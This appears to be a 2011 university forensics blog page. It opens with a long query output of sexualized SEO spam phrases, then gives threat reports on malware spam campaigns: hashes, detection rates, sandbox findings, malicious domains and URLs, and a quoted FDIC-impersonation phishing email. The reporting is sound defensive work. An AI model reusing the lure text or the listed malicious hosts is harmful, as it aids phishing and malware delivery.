JULY-2011: SEXY WORLD MAP
JULY-2011: WORLD MAP OF BABE
JULY-2011: WORLD-MAP OF BABE
JULY-2011: WORLD MAP OF BABIES
JULY-2011: WORLD-MAP OF BABIES
JULY-2011: WORLD MAP OF BABY
JULY-2011: WORLD-MAP OF BABY
JULY-2011: WORLD MAP OF GIRLS
JULY-2011: WORLD-MAP OF GIRLS
JULY-2011: WORLD-MAP OF PUSSIES
JULY-2011: WORLD MAP OF PUSSY
JULY-2011: WORLD-MAP OF PUSSY
KNOW-HOW: BABECITIES IN WORLD
KNOW-HOW: BABEPLACES IN WORLD
KNOW-HOW: BABESPOTS IN WORLD
KNOW-HOW: BABIESCITIES IN WORLD
KNOW-HOW: BABIESSPOTS IN WORLD
KNOW-HOW: BABYCITIES IN WORLD
KNOW-HOW: BABYPLACES IN WORLD
KNOW-HOW: BABYSPOTS IN WORLD
KNOW-HOW: GIRLSPLACES IN WORLD
KNOW-HOW: HOT BABE PLACES
KNOW-HOW: HOT BABE SPOTS
KNOW-HOW: HOT BABIES CITIES
KNOW-HOW: HOT BABIES PLACES
KNOW-HOW: HOT BABIES SPOTS
KNOW-HOW: HOT BABY CITIES
KNOW-HOW: HOT BABY PLACES
KNOW-HOW: HOT BABY SPOTS
KNOW-HOW: HOT CITIES OF BABE
KNOW-HOW: HOTCITIES OF BABE
KNOW-HOW: HOT CITIES OF BABIES
KNOW-HOW: HOTCITIES OF BABIES
KNOW-HOW: HOT CITIES OF BABY
KNOW-HOW: HOTCITIES OF BABY
KNOW-HOW: HOT CITIES OF PUSSIES
KNOW-HOW: HOTCITIES OF PUSSY
KNOW-HOW: HOT GIRLS CITIES
KNOW-HOW: HOT GIRLS SPOTS
KNOW-HOW: HOT PLACES OF BABE
KNOW-HOW: HOTPLACES OF BABE
KNOW-HOW: HOT PLACES OF BABIES
KNOW-HOW: HOTPLACES OF BABIES
KNOW-HOW: HOTPLACES OF BABY
KNOW-HOW: HOT PLACES OF GIRLS
KNOW-HOW: HOTPLACES OF GIRLS
KNOW-HOW: HOT PLACES OF PUSSIES
KNOW-HOW: HOT PLACES OF PUSSY
KNOW-HOW: HOTPLACES OF PUSSY
KNOW-HOW: HOT PUSSIES CITIES
KNOW-HOW: HOT PUSSIES PLACES
KNOW-HOW: HOT PUSSY PLACES
KNOW-HOW: HOT SPOTS OF BABE
KNOW-HOW: HOTSPOTS OF BABE
KNOW-HOW: HOT SPOTS OF BABY
KNOW-HOW: HOTSPOTS OF BABY
KNOW-HOW: HOTSPOTS OF GIRLS
KNOW-HOW: HOTSPOTS OF PUSSY
KNOW-HOW: LOVE BABE CITIES
KNOW-HOW: LOVE BABE SPOTS
KNOW-HOW: LOVE BABIES CITIES
KNOW-HOW: LOVE BABIES PLACES
KNOW-HOW: LOVE BABY CITIES
KNOW-HOW: LOVE CITIES IN WORLD
KNOW-HOW: LOVECITIES IN WORLD
KNOW-HOW: LOVECITIES OF BABE
KNOW-HOW: LOVECITIES OF BABIES
KNOW-HOW: LOVE CITIES OF BABY
KNOW-HOW: LOVECITIES OF BABY
KNOW-HOW: LOVE CITIES OF GIRLS
KNOW-HOW: LOVECITIES OF PUSSIES
KNOW-HOW: LOVE CITIES OF PUSSY
KNOW-HOW: LOVECITIES OF PUSSY
KNOW-HOW: LOVE GIRLS CITIES
KNOW-HOW: LOVE GIRLS SPOTS
KNOW-HOW: LOVE MAP OF BABE
KNOW-HOW: LOVE MAP OF BABIES
KNOW-HOW: LOVE MAP OF BABY
KNOW-HOW: LOVE-MAP OF BABY
KNOW-HOW: LOVE MAP OF GIRLS
KNOW-HOW: LOVE-MAP OF GIRLS
KNOW-HOW: LOVE MAP OF PUSSIES
KNOW-HOW: LOVE-MAP OF PUSSIES
KNOW-HOW: LOVE MAP OF PUSSY
KNOW-HOW: LOVE-MAP OF PUSSY
KNOW-HOW: LOVE PLACES IN WORLD
KNOW-HOW: LOVEPLACES IN WORLD
KNOW-HOW: LOVE PLACES OF BABE
KNOW-HOW: LOVEPLACES OF BABE
KNOW-HOW: LOVEPLACES OF BABIES
KNOW-HOW: LOVE PLACES OF BABY
KNOW-HOW: LOVEPLACES OF BABY
KNOW-HOW: LOVE PLACES OF GIRLS
KNOW-HOW: LOVEPLACES OF GIRLS
KNOW-HOW: LOVE PLACES OF PUSSIES
KNOW-HOW: LOVEPLACES OF PUSSIES
KNOW-HOW: LOVE PLACES OF PUSSY
KNOW-HOW: LOVEPLACES OF PUSSY
KNOW-HOW: LOVE PUSSIES CITIES
KNOW-HOW: LOVE PUSSIES PLACES
KNOW-HOW: LOVE PUSSIES SPOTS
KNOW-HOW: LOVE PUSSY CITIES
KNOW-HOW: LOVE PUSSY PLACES
KNOW-HOW: LOVE PUSSY SPOTS
KNOW-HOW: LOVE SPOTS IN WORLD
KNOW-HOW: LOVE SPOTS OF BABE
KNOW-HOW: LOVESPOTS OF BABE
KNOW-HOW: LOVESPOTS OF BABIES
KNOW-HOW: LOVESPOTS OF BABY
KNOW-HOW: LOVE SPOTS OF GIRLS
KNOW-HOW: LOVESPOTS OF GIRLS
KNOW-HOW: LOVE SPOTS OF PUSSIES
KNOW-HOW: LOVESPOTS OF PUSSIES
KNOW-HOW: LOVESPOTS OF PUSSY
KNOW-HOW: PUSSYPLACES IN WORLD
KNOW-HOW: PUSSYSPOTS IN WORLD
KNOW-HOW: SEXY CITIES IN WORLD
KNOW-HOW: SEXYCITIES IN WORLD
KNOW-HOW: SEXY LOVE MAP
KNOW-HOW: SEXY LOVE-MAP
KNOW-HOW: SEXY PLACES IN WORLD
KNOW-HOW: SEXYPLACES IN WORLD
KNOW-HOW: SEXY SPOTS IN WORLD
KNOW-HOW: SEXYSPOTS IN WORLD
KNOW-HOW: SEXY WORLD MAP
KNOW-HOW: SEXY WORLD-MAP
KNOW-HOW: WORLD MAP OF BABE
KNOW-HOW: WORLD-MAP OF BABE
KNOW-HOW: WORLD MAP OF BABIES
KNOW-HOW: WORLD-MAP OF BABIES
KNOW-HOW: WORLD MAP OF BABY
KNOW-HOW: WORLD-MAP OF BABY
KNOW-HOW: WORLD MAP OF GIRLS
KNOW-HOW: WORLD-MAP OF GIRLS
KNOW-HOW: WORLD-MAP OF PUSSIES
KNOW-HOW: WORLD MAP OF PUSSY
LOVE BABE CITIES 2011
LOVE BABE PLACES 2011
LOVE BABE SPOTS 2011
LOVE BABIES CITIES 2011
LOVE BABIES PLACES 2011
LOVE BABIES SPOTS 2011
LOVE BABY CITIES 2011
LOVE BABY PLACES 2011
LOVE BABY SPOTS 2011
LOVE CITIES IN WORLD 2011
LOVE CITIES OF BABE 2011
LOVECITIES OF BABE 2011
LOVE CITIES OF BABIES 2011
LOVECITIES OF BABIES 2011
LOVE CITIES OF BABY 2011
LOVECITIES OF BABY 2011
LOVE CITIES OF GIRLS 2011
LOVECITIES OF GIRLS 2011
LOVE CITIES OF PUSSIES 2011
LOVECITIES OF PUSSIES 2011
LOVE CITIES OF PUSSY 2011
LOVECITIES OF PUSSY 2011
LOVE GIRLS CITIES 2011
LOVE GIRLS PLACES 2011
LOVE GIRLS SPOTS 2011
LOVE MAP OF BABE 2011
LOVE-MAP OF BABE 2011
LOVE MAP OF BABIES 2011
LOVE-MAP OF BABIES 2011
LOVE MAP OF BABY 2011
LOVE-MAP OF BABY 2011
LOVE-MAP OF GIRLS 2011
LOVE MAP OF PUSSIES 2011
LOVE-MAP OF PUSSY 2011
LOVE PLACES IN WORLD 2011
LOVEPLACES IN WORLD 2011
LOVE PLACES OF BABE 2011
LOVEPLACES OF BABE 2011
LOVE PLACES OF BABIES 2011
LOVEPLACES OF BABIES 2011
LOVEPLACES OF BABY 2011
LOVE PLACES OF GIRLS 2011
LOVEPLACES OF GIRLS 2011
LOVE PLACES OF GIRLS IN WORLD
LOVEPLACES OF GIRLS IN WORLD
LOVE PLACES OF PUSSIES 2011
LOVEPLACES OF PUSSIES 2011
LOVE PLACES OF PUSSY 2011
LOVEPLACES OF PUSSY 2011
LOVE PUSSIES PLACES 2011
LOVE PUSSIES SPOTS 2011
LOVE PUSSY CITIES 2011
LOVE PUSSY PLACES 2011
LOVE PUSSY SPOTS 2011
LOVE SPOTS IN WORLD 2011
LOVESPOTS IN WORLD 2011
LOVESPOTS OF BABE 2011
LOVE SPOTS OF BABIES 2011
LOVESPOTS OF BABIES 2011
LOVE SPOTS OF BABY 2011
LOVESPOTS OF BABY 2011
LOVE SPOTS OF GIRLS 2011
LOVESPOTS OF GIRLS 2011
LOVE SPOTS OF GIRLS IN WORLD
LOVE SPOTS OF PUSSIES 2011
LOVESPOTS OF PUSSIES 2011
LOVE SPOTS OF PUSSY 2011
LOVESPOTS OF PUSSY 2011
PUSSIESCITIES IN WORLD 2011
PUSSIESPLACES IN WORLD
PUSSIESSPOTS IN WORLD 2011
PUSSYCITIES IN WORLD 2011
PUSSYPLACES IN WORLD 2011
PUSSYSPOTS IN WORLD 2011
SEXY CITIES IN WORLD 2011
SEXY LOVE MAP 2011
SEXY LOVE-MAP 2011
SEXY PLACES IN WORLD 2011
SEXYPLACES IN WORLD 2011
SEXY SPOTS IN WORLD
SEXYSPOTS IN WORLD
SEXY WORLD MAP 2011
SUMMER-2011: BABECITIES IN WORLD
SUMMER-2011: BABEPLACES IN WORLD
SUMMER-2011: BABIESCITIES IN WORLD
SUMMER-2011: BABIESPLACES IN WORLD
SUMMER-2011: BABYCITIES IN WORLD
SUMMER-2011: BABYPLACES IN WORLD
SUMMER-2011: GIRLSCITIES IN WORLD
SUMMER-2011: GIRLSPLACES IN WORLD
SUMMER-2011: GIRLSSPOTS IN WORLD
SUMMER-2011: HOT BABE SPOTS
SUMMER-2011: HOT BABIES CITIES
SUMMER-2011: HOT BABIES PLACES
SUMMER-2011: HOT BABY PLACES
SUMMER-2011: HOT CITIES OF BABE
SUMMER-2011: HOTCITIES OF BABE
SUMMER-2011: HOT CITIES OF BABIES
SUMMER-2011: HOT CITIES OF BABY
SUMMER-2011: HOTCITIES OF BABY
SUMMER-2011: HOT CITIES OF GIRLS
SUMMER-2011: HOT CITIES OF PUSSIES
SUMMER-2011: HOT CITIES OF PUSSY
SUMMER-2011: HOTCITIES OF PUSSY
SUMMER-2011: HOT GIRLS CITIES
SUMMER-2011: HOTPLACES OF BABE
SUMMER-2011: HOT PLACES OF BABIES
SUMMER-2011: HOTPLACES OF BABIES
SUMMER-2011: HOT PLACES OF BABY
SUMMER-2011: HOTPLACES OF BABY
SUMMER-2011: HOT PLACES OF GIRLS
SUMMER-2011: HOTPLACES OF GIRLS
SUMMER-2011: HOT PLACES OF PUSSIES
SUMMER-2011: HOTPLACES OF PUSSIES
SUMMER-2011: HOT PLACES OF PUSSY
SUMMER-2011: HOTPLACES OF PUSSY
SUMMER-2011: HOT PUSSIES CITIES
SUMMER-2011: HOT PUSSIES PLACES
SUMMER-2011: HOT PUSSY CITIES
SUMMER-2011: HOT PUSSY SPOTS
SUMMER-2011: HOT SPOTS OF BABE
SUMMER-2011: HOTSPOTS OF BABE
SUMMER-2011: HOT SPOTS OF BABIES
SUMMER-2011: HOTSPOTS OF BABIES
SUMMER-2011: HOT SPOTS OF BABY
SUMMER-2011: HOTSPOTS OF BABY
SUMMER-2011: HOT SPOTS OF GIRLS
SUMMER-2011: HOTSPOTS OF GIRLS
SUMMER-2011: HOT SPOTS OF PUSSIES
SUMMER-2011: HOTSPOTS OF PUSSIES
SUMMER-2011: HOT SPOTS OF PUSSY
SUMMER-2011: HOTSPOTS OF PUSSY
SUMMER-2011: LOVE BABE CITIES
SUMMER-2011: LOVE BABE PLACES
SUMMER-2011: LOVE BABE SPOTS
SUMMER-2011: LOVE BABIES CITIES
SUMMER-2011: LOVE BABIES SPOTS
SUMMER-2011: LOVE BABY CITIES
SUMMER-2011: LOVE BABY PLACES
SUMMER-2011: LOVE CITIES IN WORLD
SUMMER-2011: LOVE CITIES OF BABE
SUMMER-2011: LOVECITIES OF BABE
SUMMER-2011: LOVECITIES OF BABIES
SUMMER-2011: LOVE CITIES OF BABY
SUMMER-2011: LOVECITIES OF BABY
SUMMER-2011: LOVE CITIES OF PUSSIES
SUMMER-2011: LOVECITIES OF PUSSIES
SUMMER-2011: LOVE CITIES OF PUSSY
SUMMER-2011: LOVECITIES OF PUSSY
SUMMER-2011: LOVE GIRLS CITIES
SUMMER-2011: LOVE GIRLS PLACES
SUMMER-2011: LOVE GIRLS SPOTS
SUMMER-2011: LOVE MAP OF BABE
SUMMER-2011: LOVE-MAP OF BABE
SUMMER-2011: LOVE MAP OF BABIES
SUMMER-2011: LOVE-MAP OF BABIES
SUMMER-2011: LOVE MAP OF BABY
SUMMER-2011: LOVE-MAP OF BABY
SUMMER-2011: LOVE-MAP OF GIRLS
SUMMER-2011: LOVE MAP OF PUSSIES
SUMMER-2011: LOVE-MAP OF PUSSIES
SUMMER-2011: LOVE MAP OF PUSSY
SUMMER-2011: LOVE-MAP OF PUSSY
SUMMER-2011: LOVE PLACES OF BABE
SUMMER-2011: LOVEPLACES OF BABE
SUMMER-2011: LOVE PLACES OF BABIES
SUMMER-2011: LOVEPLACES OF BABIES
SUMMER-2011: LOVE PLACES OF BABY
SUMMER-2011: LOVEPLACES OF BABY
SUMMER-2011: LOVE PLACES OF GIRLS
SUMMER-2011: LOVEPLACES OF GIRLS
SUMMER-2011: LOVE PLACES OF PUSSIES
SUMMER-2011: LOVEPLACES OF PUSSIES
SUMMER-2011: LOVEPLACES OF PUSSY
SUMMER-2011: LOVE PUSSIES CITIES
SUMMER-2011: LOVE PUSSIES PLACES
SUMMER-2011: LOVE PUSSIES SPOTS
SUMMER-2011: LOVE PUSSY CITIES
SUMMER-2011: LOVE PUSSY SPOTS
SUMMER-2011: LOVE SPOTS IN WORLD
SUMMER-2011: LOVESPOTS IN WORLD
SUMMER-2011: LOVE SPOTS OF BABE
SUMMER-2011: LOVESPOTS OF BABE
SUMMER-2011: LOVE SPOTS OF BABIES
SUMMER-2011: LOVESPOTS OF BABIES
SUMMER-2011: LOVE SPOTS OF BABY
SUMMER-2011: LOVESPOTS OF BABY
SUMMER-2011: LOVE SPOTS OF GIRLS
SUMMER-2011: LOVE SPOTS OF PUSSIES
SUMMER-2011: LOVESPOTS OF PUSSIES
SUMMER-2011: LOVE SPOTS OF PUSSY
SUMMER-2011: LOVESPOTS OF PUSSY
SUMMER-2011: PUSSYCITIES IN WORLD
SUMMER-2011: PUSSYPLACES IN WORLD
SUMMER-2011: SEXYCITIES IN WORLD
SUMMER-2011: SEXY LOVE MAP
SUMMER-2011: SEXY LOVE-MAP
SUMMER-2011: SEXY PLACES IN WORLD
SUMMER-2011: SEXYPLACES IN WORLD
SUMMER-2011: SEXY SPOTS IN WORLD
SUMMER-2011: SEXYSPOTS IN WORLD
SUMMER-2011: SEXY WORLD MAP
SUMMER-2011: SEXY WORLD-MAP
SUMMER-2011: WORLD MAP OF BABE
SUMMER-2011: WORLD-MAP OF BABE
SUMMER-2011: WORLD MAP OF BABIES
SUMMER-2011: WORLD MAP OF BABY
SUMMER-2011: WORLD-MAP OF BABY
SUMMER-2011: WORLD MAP OF GIRLS
SUMMER-2011: WORLD-MAP OF GIRLS
SUMMER-2011: WORLD MAP OF PUSSIES
SUMMER-2011: WORLD-MAP OF PUSSIES
SUMMER-2011: WORLD-MAP OF PUSSY
WORLD MAP OF BABE 2011
WORLD MAP OF BABIES 2011
WORLD-MAP OF BABIES 2011
WORLD-MAP OF BABY 2011
WORLD MAP OF GIRLS 2011
WORLD-MAP OF GIRLS 2011
WORLD MAP OF PUSSY 2011
WORLD-MAP OF PUSSY 2011
(532 rows)

{ Comments on this entry are closed }

"Wrong Transaction" Hotel spam malware continues to evolve

by UAB's Director of Research in Computer Forensics on July 31, 2011

in SBN

One of the distinct advantages of having the UAB Spam Data Mine is that we are able to provide near-real-time intelligence about the evolution of malware campaigns being delivered by spam. On July 27, 2011 we provided a warning about Wrong Transaction Hotel Spam that was covered by Robert McMillan in PC World and ComputerWorld, and was also mentioned by Matt Liebowitz for MSNBC.

Unfortunately, from an anti-virus perspective, consumers are no safer than they were when we first put out the warning four days ago.

We're still seeing more than 1,000 copies per day of this malware (with the exception of the 29th) each day:

 count | receiving_date
-------+----------------
  1516 | 2011-07-27
  1828 | 2011-07-28
   813 | 2011-07-29
  1470 | 2011-07-30
  1258 | 2011-07-31
(5 rows)


but the malware is constantly evolving.

CountMalware MD5TimeRange
593c15eb3c47800fec025b6a86a6409f144 2011-07-27 03:00 AM to 2011-07-27 08:30 AM
100101e3bbd4b6f8c22a3516771f9b6792bc 2011-07-27 12:45 PM to 2011-07-28 04:45 AM
31857d931256fd6d7184528ae983e34677b 2011-07-27 08:00 AM to 2011-07-27 13:30 PM
8656e2eae488317280dd813e3e2fc9e0275 2011-07-28 04:15 AM to 2011-07-28 13:00 PM
554ad760ac5806a84a272e1eb76b315ac31 2011-07-28 12:30 PM to 2011-07-28 20:15 PM
11164140ee10115174fe36a738d4d943f2af 2011-07-29 13:45 PM to 2011-07-30 04:00 AM
614e2d3d4ccf02ea924e6d11cb452235f4c 2011-07-30 03:30 AM to 2011-07-30 16:15 PM
9315bbe80ad216c89bcbb6891178dc4b5fa 2011-07-30 14:45 PM to 2011-07-31 07:30 AM
409ca84d1a0c49eff5ca829b5fa531800e8 2011-07-31 07:30 AM to 2011-07-31 13:15 PM
484aa412182a164321a159f9b2e95be53bc 2011-07-31 13:15 PM to 2011-07-31 CURRENT TIME


Each of the links in the table above will take you to the VirusTotal report showing how many of 43 different anti-virus products detected this particular malware at the time it was submitted to VirusTotal.

I'll let you explore the links for yourself, but may I call attention to the fact the last one is detected by FOUR of forty-three AV products, and the one immediately prior to that by ONE of forty-three.

Just to make sure there was not a problem, I decided to look at those last two and confirm that they actually were malware.

We started with the sample starting with "aa412". It unpacks successfully as an .exe named "Refund_Form" that uses an icon from Microsoft Office Excel to try to trick people into thinking it's a Spreadsheet.

When we launched it, it made connections to:

runescapegpge2011.ru - 84.247.61.25
www.radio-80.com - 210.172.192.38
heftyhips.com - 66.197.251.53

That last would be exactly the same domain that the first sample we looked at on the 27th connected to. It fetched "soft.exe" from www.radio-80.com.

I'm going to go out on a limb and say this is malware. "soft.exe" got renamed "defender.exe" and placed in our "C:\Documents and Settings\All Users\Application Data\" directory, which was scheduled to launch when the machine reboots.

Defender.exe was declared to be malware by 6 of 43 anti-virus packages at VirusTotal. Here's the report. It's Fake anti-virus.

Next, just to be thorough, we also checked out the version that started with "ca84d1". Just like the first, it unpacked to a "Refund_Form.exe" file, although this one had a different MD5. When we launched Refund_Form it made network connections to:

runescapegpge2011.ru - 84.247.61.25
ewingparkbmx2011.ru - failed to resolve

It looks like this version is not functioning due to a dead domain, which may be the reason the "aa412" version was released.

That "84.247.61.25" box is in Romania, currently using a domain name with "RuneScape" in the domain name. The same IP has recently been called bedownloader2011.ru, diamondexchange2011.ru, watchfamilyguynow2011.ru and is also currently resolving as yomwarayom2001.ru.

Update 01AUG2011



At 3:15 this morning, the malware being distributed swapped to:

2e749d608d29aef739f5b08e7f63225a (click for VirusTotal Report)

The MD5 for the exe inside of the zip file with MD5 2e749d608d29aef739f5b08e7f63225a is:

a446ced5db1de877cf78f77741e2a804 Filename: Refund-Form (dot) exe (1 of 43 detects at VirusTotal).


At 4:30 this morning, and continuing to the present moment (07:45 AM Central Time), the malware being distributed swapped to:

4b126c49c261ca0f65fce9e5d08811d6 (click for VirusTotal Report)

The MD5 for the exe inside of the zip file with MD5 4b126c49c261ca0f65fce9e5d08811d6 is:

2f0155c39ddcf490f3a310ba0546c627 Filename: Refund_Form (dot) exe (5 of 43 detects at VirusTotal).

{ Comments on this entry are closed }

"Government-related" Zeus spam continues

by UAB's Director of Research in Computer Forensics on July 28, 2011

in SBN

As we discussed in yesterday's article, "Wrong transaction" hotel spam, the UAB Spam Data Mine now has an ability to provide early alerting when a new spam campaign is directly linking to executable files.

This morning we have a new example of this capability in the form of the two most recent installments of a long-running "government-related" Zeus campaign.

One of the two spammed destinations is:

alert-irs.com /00000700973770US.exe MD5 = 0691a4856713edc97664e60db735747c

This malware is currently showing a (12 of 43) detection rate at VirusTotal, as seen in this VirusTotal Report.

The other spammed destination is:

fdic-updates.com /system_update_07_28.exe MD5 = 7a0303fdb809ac0c1a84123b106992c2

This malware is currently showing a (8 of 43) detection rate at VirusTotal, as seen in this VirusTotal Report.

Both files are 172,032 bytes in size, but currently the FDIC one is showing a dramatically wider distribution via email than the IRS one, which may be an indication of "targeting" by the latter.

The FDIC version has been seen almost 500 times, despite the fact that the campaign is less than 45 minutes old as of this writing. Here is the count per 15 minute block seen in the UAB Spam Data Mine:

     5 | ACH and Wire transfers disabled.      | 2011-07-28 06:00:00
     3 | Banking security update.              | 2011-07-28 06:00:00
     1 | Update for your banking account.      | 2011-07-28 06:00:00
   107 | ACH and Wire transfers disabled.      | 2011-07-28 05:45:00
   138 | Banking security update.              | 2011-07-28 05:45:00
   108 | Security update for banking accounts. | 2011-07-28 05:45:00
   122 | Update for your banking account.      | 2011-07-28 05:45:00
     1 | Banking security update.              | 2011-07-28 05:30:00
     1 | Security update for banking accounts. | 2011-07-28 05:30:00
     1 | ACH and Wire transfers disabled.      | 2011-07-28 05:15:00
     1 | Banking security update.              | 2011-07-28 05:15:00
     1 | Security update for banking accounts. | 2011-07-28 05:15:00


(Timestamps are US-Central Time, GMT -6)


The FDIC spam comes from email addresses that randomly associate these "usernames" with these "hostnames". Everything in the first column was seen combined with everything in the second column.

admin            @   admin.fdic.gov
adminnistration  @   administration.fdic.gov
cunsumer         @   fdic.gov
FDIC             @   security.fdic.gov
finance          @
govdelivery      @
information      @
inspector        @
news             @
no-reply         @
privacy_policy   @
protection       @
public           @
report           @
service          @
stats            @
support          @
webannouncements @


Here's what the email actually says:

Dear clients,
Your account ACH and Wire transactions have been
temporarily suspended for your settings, due to the
expiration of your security version. To download and install the
newest Updates, click here.

As soon as it is Applied, your transaction abilities will be fully restored.

Best regards,
Online security department
Federal Deposit Insurance Corporation



The IRS related spam came first:

     2 | Internal Revenue Service     | 2011-07-28 04:15:00
     2 | Federal Tax payment rejected | 2011-07-28 04:00:00
     2 | Your IRS payment rejected    | 2011-07-28 04:00:00
     2 | Internal Revenue Service     | 2011-07-28 03:45:00


This is fairly typical spamming for this group. They like to make a new Zeus variant, populate it on a website, and then spam it very hard at the beginning of the East Coast business day. For example, here is the spam for:

"nacha-rejected.com" 

     2 | Rejected transaction | 2011-07-27 05:30:00
     1 | Canceled  payment    | 2011-07-27 05:15:00
     2 | Canceled transaction | 2011-07-27 05:15:00
     3 | Payment rejected     | 2011-07-27 05:15:00
     5 | Rejected transaction | 2011-07-27 05:15:00
     2 | Canceled transaction | 2011-07-27 05:00:00
     8 | Canceled transfer    | 2011-07-27 05:00:00
     5 | Payment canceled     | 2011-07-27 05:00:00
     3 | Payment rejected     | 2011-07-27 05:00:00
     4 | Rejected transaction | 2011-07-27 05:00:00
    92 | Canceled  payment    | 2011-07-27 04:45:00
    74 | Canceled transaction | 2011-07-27 04:45:00
    84 | Canceled transfer    | 2011-07-27 04:45:00
    60 | Payment canceled     | 2011-07-27 04:45:00
    75 | Payment rejected     | 2011-07-27 04:45:00
    57 | Rejected transaction | 2011-07-27 04:45:00
     2 | Payment canceled     | 2011-07-27 04:30:00
     1 | Payment rejected     | 2011-07-27 04:30:00
     1 | Canceled transaction | 2011-07-27 04:15:00
     2 | Payment canceled     | 2011-07-27 04:15:00


nacha-transactions.com

     1 | Payment rejected     | 2011-07-27 07:00:00
     1 | Rejected transaction | 2011-07-27 06:45:00
     4 | Canceled  payment    | 2011-07-27 06:30:00
     2 | Canceled transfer    | 2011-07-27 06:30:00
     1 | Payment canceled     | 2011-07-27 06:30:00
     1 | Payment rejected     | 2011-07-27 06:30:00
     1 | Canceled transaction | 2011-07-27 06:15:00
     1 | Canceled transfer    | 2011-07-27 06:15:00
     1 | Payment canceled     | 2011-07-27 06:15:00
     1 | Payment rejected     | 2011-07-27 06:15:00


taxes-refund.com

     1 | Internal Revenue Service        | 2011-07-27 08:00:00
     1 | U.S. Department of the Treasury | 2011-07-27 08:00:00
     1 | Internal Revenue Service        | 2011-07-27 07:45:00
     2 | Internal Revenue Service (IRS)  | 2011-07-27 07:45:00
     2 | Payment IRS.gov                 | 2011-07-27 07:45:00
     1 | Internal Revenue Service        | 2011-07-27 07:30:00
     1 | IRS.gov                         | 2011-07-27 07:30:00
     1 | U.S. Department of the Treasury | 2011-07-27 07:30:00


Three consecutive campaigns, one following the other, with the whole thing wrapping up before 8 AM Central time. (which would be 9 AM Eastern time).

The NACHA spam leading to Zeus has been an issue for a very long time. We've seen spam like this since all the way back to November 2009, but it's been fairly constant since February of this year when we shared the article ACH Transaction Rejected Payment Spam.

Following the Botnet Back in Time


Because of the way we archive our email, it's possible for us to ask the UAB Spam Data Mine to reveal a deeper history for this particular spamming botnet by asking a question like:

"Show me all the spam subjects that have been sent by IP addresses that sent me this morning's fdic-updates.com spam message"

     5 | 2011-07-28 06:00:00 | ACH and Wire transfers disabled.
     3 | 2011-07-28 06:00:00 | Banking security update.
     1 | 2011-07-28 06:00:00 | Update for your banking account.
   107 | 2011-07-28 05:45:00 | ACH and Wire transfers disabled.
   138 | 2011-07-28 05:45:00 | Banking security update.
   108 | 2011-07-28 05:45:00 | Security update for banking accounts.
   122 | 2011-07-28 05:45:00 | Update for your banking account.
     1 | 2011-07-28 05:30:00 | Banking security update.
     1 | 2011-07-28 05:30:00 | Security update for banking accounts.
     1 | 2011-07-28 05:15:00 | ACH and Wire transfers disabled.
     1 | 2011-07-28 05:15:00 | Banking security update.
     1 | 2011-07-28 05:15:00 | Security update for banking accounts.
     1 | 2011-07-27 23:30:00 | ho
     1 | 2011-07-27 21:15:00 | RE:.. How do you do,
     4 | 2011-07-27 20:00:00 | ho
     1 | 2011-07-27 14:45:00 | VIDEO: Lockerbie bomber at pro-Gaddafi rally
     1 | 2011-07-27 12:00:00 | Yo
     1 | 2011-07-27 08:00:00 | Internal Revenue Service
     1 | 2011-07-27 06:45:00 | Rejected transaction
     2 | 2011-07-27 05:15:00 | Rejected transaction
     2 | 2011-07-27 05:00:00 | Canceled transaction
     2 | 2011-07-27 05:00:00 | Canceled transfer
     3 | 2011-07-27 05:00:00 | Payment rejected
    33 | 2011-07-27 04:45:00 | Canceled  payment
    22 | 2011-07-27 04:45:00 | Canceled transaction
    26 | 2011-07-27 04:45:00 | Canceled transfer
    24 | 2011-07-27 04:45:00 | Payment canceled
    30 | 2011-07-27 04:45:00 | Payment rejected
    17 | 2011-07-27 04:45:00 | Rejected transaction
     1 | 2011-07-27 04:30:00 | Payment canceled
     1 | 2011-07-27 04:15:00 | Canceled transaction
     1 | 2011-07-27 04:15:00 | Payment canceled
     1 | 2011-07-26 17:15:00 | Attack on Guinea leader repelled
     1 | 2011-07-26 06:00:00 | IRC.gov
     1 | 2011-07-26 05:45:00 | VIDEO: Phoenix hit by second dust storm
     1 | 2011-07-25 14:00:00 | Hi!
     1 | 2011-07-23 19:45:00 | Giant space telescope reaches orbit
     1 | 2011-07-23 19:45:00 | High Court challenge on care cuts
     1 | 2011-07-23 19:45:00 | HMRC in cost-cutting 'challenge'
     1 | 2011-07-23 19:45:00 | Mortgage lending remains subdued
     1 | 2011-07-23 19:45:00 | Mum's stress reaches baby in womb
     1 | 2011-07-23 19:45:00 | Nato hands over key Afghan city
     1 | 2011-07-23 19:45:00 | Personal pension advice still bad
     1 | 2011-07-23 19:45:00 | Scots economy escapes recession
     1 | 2011-07-23 19:45:00 | Serbia arrests last war crimes fugitive
     1 | 2011-07-23 19:45:00 | Strauss-Kahn daughter questioned
     1 | 2011-07-23 19:45:00 | VIDEO: Key moments as MPs grill Murdochs
     1 | 2011-07-23 18:30:00 | Heya
     2 | 2011-07-22 19:45:00 | Hi
     1 | 2011-07-22 19:00:00 | Hey
     1 | 2011-07-22 19:00:00 | Hi
     1 | 2011-07-22 13:45:00 | Heya
     1 | 2011-07-22 07:15:00 | Read: A Must for High-Rise Emergencies
     1 | 2011-07-22 05:00:00 | IRC.gov
     1 | 2011-07-22 04:45:00 | Support IRS.gov
     2 | 2011-07-22 03:45:00 | Change Confirmation
     1 | 2011-07-22 03:45:00 | Does your enterprise including outstanding tax debts
     1 | 2011-07-22 03:45:00 | Internal Revenue Service
     1 | 2011-07-22 03:45:00 | Internal Revenue Service United States Department of the Treasury
     1 | 2011-07-22 03:45:00 | IRC.gov
     1 | 2011-07-22 03:45:00 | IRS.gov US
     1 | 2011-07-22 03:45:00 | Notice of Underreported Income
     3 | 2011-07-22 03:45:00 | Support IRS.gov
     2 | 2011-07-22 03:45:00 | Treasury Inspector General for Tax Administration
     2 | 2011-07-22 03:45:00 | U.S. Department of the Treasury
     2 | 2011-07-22 03:45:00 | Your company including unpaid tax debts
     1 | 2011-07-21 13:00:00 | Manhood raisers with price-offs!
     1 | 2011-07-21 13:00:00 | Super lasting and good stiff!
     1 | 2011-07-21 05:45:00 | New security update
     2 | 2011-07-21 04:45:00 | Go id token update
     6 | 2011-07-21 04:45:00 | Security token update
     1 | 2011-07-21 04:45:00 | Token code update
     2 | 2011-07-21 04:45:00 | Token software update
     1 | 2011-07-20 07:30:00 | Canceled  payment
     1 | 2011-07-20 07:30:00 | Rejected transaction
     1 | 2011-07-20 07:00:00 | Payment rejected
     1 | 2011-07-20 06:45:00 | Canceled  payment
     1 | 2011-07-20 06:45:00 | Payment canceled
    16 | 2011-07-20 06:30:00 | Canceled  payment
     8 | 2011-07-20 06:30:00 | Canceled transaction
    10 | 2011-07-20 06:30:00 | Canceled transfer
     7 | 2011-07-20 06:30:00 | Payment canceled
